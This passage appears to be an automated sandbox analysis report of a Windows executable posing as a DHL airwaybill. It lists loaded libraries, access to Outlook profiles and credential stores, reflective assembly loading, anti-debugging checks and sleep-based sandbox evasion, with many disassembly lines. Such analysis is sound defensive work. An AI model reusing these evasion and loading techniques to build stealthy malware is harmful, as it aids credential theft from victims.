            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: ZYkF.pdbSHA256 source: DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: Binary string: ZYkF.pdb source: DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: Binary string: mshta.pdbGCTL source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381317520.0000000001508000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: toceDGfrPzLv.exe, 00000005.00000002.4604412085.0000000000FFE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2383445060.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2381315371.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL airwaybill # 6913321715 & BL Draft copy.exe, DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2383445060.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2381315371.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshta.pdb source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381317520.0000000001508000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, MainForm.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.2806948.1.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, emu8FuFpCfwR9JjoYE.cs .Net Code: QoXvRilF6i System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.69f0000.5.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, emu8FuFpCfwR9JjoYE.cs .Net Code: QoXvRilF6i System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.285c558.2.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, emu8FuFpCfwR9JjoYE.cs .Net Code: QoXvRilF6i System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.28cfa10.0.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 5.2.toceDGfrPzLv.exe.3aecd14.1.raw.unpack, MainForm.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 6.2.mshta.exe.353cd14.2.raw.unpack, MainForm.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 0_2_0279A158 pushfd ; ret 0_2_0279A165
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 0_2_04D5ED4A push ecx; retf 0_2_04D5ED4B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 0_2_04D531F9 push dword ptr [ecx+edx-75h]; iretd 0_2_04D531CF
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_00401866 push cs; retf 3_2_0040186F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_004148B5 push es; iretd 3_2_004148B7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_00414147 push esp; iretd 3_2_0041414A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_0041631C push edi; retf 3_2_00416340
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_00417BE1 push esi; retf 002Fh 3_2_00417BE2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_004033F0 push eax; ret 3_2_004033F2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_0041044C push es; ret 3_2_00410451
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_00407438 push esp; iretd 3_2_0040743F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_0041548D push ecx; iretd 3_2_00415497
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_004174A7 push cs; iretd 3_2_004174AA
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_01AD225F pushad ; ret 3_2_01AD27F9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_01AD27FA pushad ; ret 3_2_01AD27F9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_01B009AD push ecx; mov dword ptr [esp], ecx 3_2_01B009B6
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_01AD283D push eax; iretd 3_2_01AD2858
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_01AD1368 push eax; iretd 3_2_01AD1369
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_03441E07 push es; iretd 5_2_03441E09
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_03441699 push esp; iretd 5_2_0344169C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_03445133 push esi; retf 002Fh 5_2_03445134
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_034429DF push ecx; iretd 5_2_034429E9
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_034449F9 push cs; iretd 5_2_034449FC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_0343498A push esp; iretd 5_2_03434991
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_0343D99E push es; ret 5_2_0343D9A3
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_0344386E push edi; retf 5_2_03443892
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_05F8DCF4 push esp; iretd 5_2_05F8DCF7
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_05F8E462 push es; iretd 5_2_05F8E464
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_05F89FF9 push es; ret 5_2_05F89FFE
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_05F80FE5 push esp; iretd 5_2_05F80FEC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Code function: 5_2_05F9178E push esi; retf 002Fh 5_2_05F9178F
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe Static PE information: section name: .text entropy: 7.771292073435149
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack High entropy of concatenated method names
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack High entropy of concatenated method names
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack High entropy of concatenated method names
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, R3xhl7XDuPEX7EZrS0.csHigh entropy of concatenated method names: 'iyIHgO7SI6', 'v6kHU6mwXX', 'FSnoLWnlF7', 'nH5oKsSgTe', 'fp5H6Q4aCW', 'NCFHPWBttf', 'uAaH9Z2oII', 'x8cHlYsNsN', 'S1mHJauNbJ', 'bj3HCj13Rm'
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe File created: \dhl airwaybill # 6913321715 & bl draft copy.exe
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: DHL airwaybill # 6913321715 & BL Draft copy.exe PID: 3212, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Memory allocated: BD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Memory allocated: 27E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Memory allocated: 2660000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Memory allocated: 85E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Memory allocated: 95E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Memory allocated: 97D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Memory allocated: A7D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_01B4096E rdtsc 3_2_01B4096E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\mshta.exe Window / User API: threadDelayed 9639
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\mshta.exe API coverage: 2.7 %
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe TID: 1172 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe TID: 1172 Thread sleep time: -80000s >= -30000s
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe TID: 1172 Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe TID: 1172 Thread sleep time: -57000s >= -30000s
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe TID: 1172 Thread sleep count: 40 > 30
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe TID: 1172 Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\SysWOW64\mshta.exe TID: 364 Thread sleep count: 333 > 30
            Source: C:\Windows\SysWOW64\mshta.exe TID: 364 Thread sleep time: -666000s >= -30000s
            Source: C:\Windows\SysWOW64\mshta.exe TID: 364 Thread sleep count: 9639 > 30
            Source: C:\Windows\SysWOW64\mshta.exe TID: 364 Thread sleep time: -19278000s >= -30000s
            Source: C:\Windows\SysWOW64\mshta.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\mshta.exe Code function: 6_2_0053C210 FindFirstFileW,FindNextFileW,FindClose,6_2_0053C210
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\mshta.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_01B4096E rdtsc 3_2_01B4096E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_00417533 LdrLoadDll,3_2_00417533
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Code function: 3_2_01B8019F mov eax, dword ptr fs:[00000030h] 3_2_01B8019F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B103E9 mov eax, dword ptr fs:[00000030h]3_2_01B103E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B103E9 mov eax, dword ptr fs:[00000030h]3_2_01B103E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B103E9 mov eax, dword ptr fs:[00000030h]3_2_01B103E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE3DB mov eax, dword ptr fs:[00000030h]3_2_01BAE3DB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE3DB mov eax, dword ptr fs:[00000030h]3_2_01BAE3DB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE3DB mov ecx, dword ptr fs:[00000030h]3_2_01BAE3DB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE3DB mov eax, dword ptr fs:[00000030h]3_2_01BAE3DB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA43D4 mov eax, dword ptr fs:[00000030h]3_2_01BA43D4
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA43D4 mov eax, dword ptr fs:[00000030h]3_2_01BA43D4
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A3C0 mov eax, dword ptr fs:[00000030h]3_2_01B0A3C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A3C0 mov eax, dword ptr fs:[00000030h]3_2_01B0A3C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A3C0 mov eax, dword ptr fs:[00000030h]3_2_01B0A3C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A3C0 mov eax, dword ptr fs:[00000030h]3_2_01B0A3C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A3C0 mov eax, dword ptr fs:[00000030h]3_2_01B0A3C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A3C0 mov eax, dword ptr fs:[00000030h]3_2_01B0A3C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B083C0 mov eax, dword ptr fs:[00000030h]3_2_01B083C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B083C0 mov eax, dword ptr fs:[00000030h]3_2_01B083C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B083C0 mov eax, dword ptr fs:[00000030h]3_2_01B083C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B083C0 mov eax, dword ptr fs:[00000030h]3_2_01B083C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBC3CD mov eax, dword ptr fs:[00000030h]3_2_01BBC3CD
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B863C0 mov eax, dword ptr fs:[00000030h]3_2_01B863C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD8324 mov eax, dword ptr fs:[00000030h]3_2_01BD8324
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD8324 mov ecx, dword ptr fs:[00000030h]3_2_01BD8324
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD8324 mov eax, dword ptr fs:[00000030h]3_2_01BD8324
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD8324 mov eax, dword ptr fs:[00000030h]3_2_01BD8324
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B20310 mov ecx, dword ptr fs:[00000030h]3_2_01B20310
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A30B mov eax, dword ptr fs:[00000030h]3_2_01B3A30B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A30B mov eax, dword ptr fs:[00000030h]3_2_01B3A30B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A30B mov eax, dword ptr fs:[00000030h]3_2_01B3A30B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFC310 mov ecx, dword ptr fs:[00000030h]3_2_01AFC310
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA437C mov eax, dword ptr fs:[00000030h]3_2_01BA437C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8035C mov eax, dword ptr fs:[00000030h]3_2_01B8035C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8035C mov eax, dword ptr fs:[00000030h]3_2_01B8035C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8035C mov eax, dword ptr fs:[00000030h]3_2_01B8035C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8035C mov ecx, dword ptr fs:[00000030h]3_2_01B8035C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8035C mov eax, dword ptr fs:[00000030h]3_2_01B8035C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8035C mov eax, dword ptr fs:[00000030h]3_2_01B8035C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA8350 mov ecx, dword ptr fs:[00000030h]3_2_01BA8350
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCA352 mov eax, dword ptr fs:[00000030h]3_2_01BCA352
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD634F mov eax, dword ptr fs:[00000030h]3_2_01BD634F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B962A0 mov eax, dword ptr fs:[00000030h]3_2_01B962A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B962A0 mov ecx, dword ptr fs:[00000030h]3_2_01B962A0
